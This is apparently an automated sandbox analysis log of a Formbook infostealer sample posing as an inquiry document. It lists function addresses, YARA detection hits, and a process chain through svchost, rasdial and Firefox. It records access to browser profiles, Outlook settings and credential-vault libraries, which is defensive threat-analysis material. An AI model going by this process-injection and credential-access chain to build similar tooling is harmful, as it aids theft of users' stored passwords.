            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A32FC86_2_04A32FC8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A82F286_2_04A82F28
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A60F306_2_04A60F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AE2F306_2_04AE2F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AB4F406_2_04AB4F40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A268B86_2_04A268B8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A6E8F06_2_04A6E8F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A4A8406_2_04A4A840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A428406_2_04A42840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A429A06_2_04A429A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B0A9A66_2_04B0A9A6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A569626_2_04A56962
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A3EA806_2_04A3EA80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF6BD76_2_04AF6BD7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFAB406_2_04AFAB40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFF43F6_2_04AFF43F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A314606_2_04A31460
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04ADD5B06_2_04ADD5B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B095C36_2_04B095C3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF75716_2_04AF7571
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF16CC6_2_04AF16CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A856306_2_04A85630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFF7B06_2_04AFF7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF70E96_2_04AF70E9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFF0E06_2_04AFF0E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AEF0CC6_2_04AEF0CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A470C06_2_04A470C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A4B1B06_2_04A4B1B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A7516C6_2_04A7516C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A2F1726_2_04A2F172
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B0B16B6_2_04B0B16B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A452A06_2_04A452A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AE12ED6_2_04AE12ED
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A5D2F06_2_04A5D2F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A5B2C06_2_04A5B2C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A8739A6_2_04A8739A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF132D6_2_04AF132D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A2D34C6_2_04A2D34C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFFCF26_2_04AFFCF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AB9C326_2_04AB9C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A5FDC06_2_04A5FDC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF7D736_2_04AF7D73
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A43D406_2_04A43D40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF1D5A6_2_04AF1D5A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A49EB06_2_04A49EB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFFFB16_2_04AFFFB1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A41F926_2_04A41F92
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A03FD26_2_04A03FD2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A03FD56_2_04A03FD5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFFF096_2_04AFFF09
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A438E06_2_04A438E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AAD8006_2_04AAD800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AD59106_2_04AD5910
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A499506_2_04A49950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A5B9506_2_04A5B950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04ADDAAC6_2_04ADDAAC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A85AA06_2_04A85AA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AE1AA36_2_04AE1AA3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AEDAC66_2_04AEDAC6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AB3A6C6_2_04AB3A6C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFFA496_2_04AFFA49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AF7A466_2_04AF7A46
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A5FB806_2_04A5FB80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AB5BF06_2_04AB5BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04A7DBF96_2_04A7DBF9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04AFFB766_2_04AFFB76
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A11BF06_2_02A11BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A0CB686_2_02A0CB68
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A0CB706_2_02A0CB70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A0AE106_2_02A0AE10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A0CD906_2_02A0CD90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A152506_2_02A15250
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A2B6306_2_02A2B630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02A134306_2_02A13430
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047DD7786_2_047DD778
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047DE70C6_2_047DE70C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047DE2586_2_047DE258
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047DE3736_2_047DE373
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04A75130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04A2B970 appears 262 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04A87E54 appears 107 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04ABF290 appears 103 times
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: String function: 00E10D27 appears 70 times
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: String function: 00DF7F41 appears 35 times
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: String function: 00E18B40 appears 42 times
            Source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1683065590.0000000004083000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 20-EM-00- PI-INQ-3001.exe
            Source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1684340650.000000000427D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 20-EM-00- PI-INQ-3001.exe
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@11/10
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5A2D5 GetLastError,FormatMessageW,0_2_00E5A2D5
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E48713 AdjustTokenPrivileges,CloseHandle,0_2_00E48713
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E48CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E48CC3
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E5B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E5B59E
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E6F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00E6F121
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E4DA5D CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,0_2_00E4DA5D
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00DF4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00DF4FE9
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeFile created: C:\Users\user\AppData\Local\Temp\autCAB9.tmpJump to behavior
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rasdial.exe, 00000006.00000003.2172046065.0000000002C92000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2171949568.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 20-EM-00- PI-INQ-3001.exeReversingLabs: Detection: 29%
            Source: 20-EM-00- PI-INQ-3001.exeVirustotal: Detection: 28%
            Source: unknownProcess created: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"Jump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 20-EM-00- PI-INQ-3001.exeStatic file information: File size 1163264 > 1048576
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 20-EM-00- PI-INQ-3001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1922768601.00000000003FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1689488135.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1685743507.0000000004150000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1909080883.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1910744947.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2001345010.000000000484E000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1999168737.0000000004699000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.1995959984.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964917968.000000000321A000.00000004.00000020.00020000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000003.1938759402.0000000000F74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1689488135.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1685743507.0000000004150000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1909080883.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1910744947.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1999497224.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.2001345010.000000000484E000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1999168737.0000000004699000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531564056.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.1995959984.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964917968.000000000321A000.00000004.00000020.00020000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000003.1938759402.0000000000F74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.000000000333C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.000000000502C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2283662036.000000003813C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.000000000333C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.000000000502C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2283662036.000000003813C000.00000004.80000000.00040000.00000000.sdmp
